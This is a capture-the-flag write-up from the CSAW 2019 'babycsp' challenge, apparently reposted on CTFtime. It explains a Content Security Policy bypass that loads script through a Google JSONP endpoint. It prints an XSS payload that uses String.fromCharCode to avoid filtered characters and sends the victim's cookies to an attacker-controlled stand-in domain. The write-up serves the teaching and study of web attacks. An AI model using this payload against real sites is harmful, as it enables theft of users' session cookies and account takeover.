CTFtime.org

babycsp

by p4w / beerpwn

Tags: web csp 

Rating:

# WRITEUP BABYCSP

## Author: p4w @beerpwn team

![Image desc](./description.png)

As the descrption/title say we will probably need to bypass CSP to trigger some XSS in order to steal the admin cookies.
Surfing to the index page we have this:

![Image desc](./index.png)

The input that we can pass is totally NOT filtered and safe from XSS.

## Understanding the CSP
The ```script-src 'self' *.google.com``` directive permit to use scripts that are coming from *.google.com, and also from the same domain.
The ```connect-src *``` directive restricts the URLs which can be loaded using script interfaces. Then in this case every URL are allowed.

## Bypassing the CSP
This is what I was thinking during the CTF:
since we can't control directily any file contents from the same domain, then we can try to 'host' some XSS payload on google subdomain. At the beginning I tried to use googleDrive to host some XSS-file but i had no lucky with that and I dind't manage to serve the raw file from google subdomains. So the second idea that comes in my mind was to use JSONP callback. More info about JSONP here. So after a bit of googling I found this page. So I used this ```https://cse.google.com/api/007627024705277327428:r3vs7b0fcli/popularqueryjs?callback=alert()``` endpoint for JSONP callback.

![Image index](./alert_jsonp.png)

## Fire the XSS
Now with this payload
`<script src='//cse.google.com/api/007627024705277327428:r3vs7b0fcli/popularqueryjs?callback=alert()'></script>`
we will be able to pop up an alert bypassing the CSP.
The only problem that I had to solve now is that some character are not usable with this JSONP endpoint as we can see here:

![Image index](./banned_char_enum.png)

This characters `? / ,` and probably more others are not allowed to construct the callback function.
So I comed up with this payload to avoid the bad chars:

<script src='//cse.google.com/api/007627024705277327428:r3vs7b0fcli/popularqueryjs?callback=location.replace(String.fromCharCode(47).concat(String.fromCharCode(47).concat("your-domain-here").concat(String.fromCharCode(47).concat(document.cookie))))'></script>

With this payload we can grab the admin-cookie by reading access.log file of our server:

![Image index](./server_log.png)

flag: flag{csp_will_solve_EVERYTHING}

Original writeup (https://github.com/beerpwn/ctf/blob/master/2019/CSAW_CTF/baby_csp/README.md).

Comments

REal0daySept. 17, 2019, 10:25 p.m.

Great writeup!